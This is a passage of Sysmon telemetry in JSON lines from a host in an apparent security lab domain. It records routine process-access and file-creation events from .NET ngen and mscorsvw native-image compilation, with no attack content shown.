.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7207,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:48.105\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0498-5F25-0000-001069560F00}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:48.105","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0498-5F25-0000-001069560F00}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7208,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:48.105\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0498-5F25-0000-001069560F00}\r\nTargetProcessId: 2368\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:48.105","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0498-5F25-0000-001069560F00}","TargetProcessId":"2368","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7209,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:48.262\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3800\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-0010A5F20E00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:48.262","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-0010A5F20E00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7210,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:48.262\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-0010A5F20E00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:48.262","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-0010A5F20E00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7211,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:48.262\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0494-5F25-0000-0010A5F20E00}\r\nTargetProcessId: 4996\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:48.262","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0494-5F25-0000-0010A5F20E00}","TargetProcessId":"4996","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:49","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":7212,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:49.262\r\nProcessGuid: {A837DB8D-0498-5F25-0000-00102B5B0F00}\r\nProcessId: 4996\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1384-0\\PresentationUI.dll\r\nCreationUtcTime: 2020-08-01 05:58:49.262","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:49.262","ProcessGuid":"{A837DB8D-0498-5F25-0000-00102B5B0F00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\1384-0\\PresentationUI.dll","CreationUtcTime":"2020-08-01 05:58:49.262","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7213,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:49.308\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0499-5F25-0000-001046610F00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:49.308","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0499-5F25-0000-001046610F00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7214,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:49.308\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0499-5F25-0000-001046610F00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:49.308","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0499-5F25-0000-001046610F00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:49","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":7215,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:49.324\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0499-5F25-0000-001046610F00}\r\nTargetProcessId: 4908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:49.324","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0499-5F25-0000-001046610F00}","TargetProcessId":"4908","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:50","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
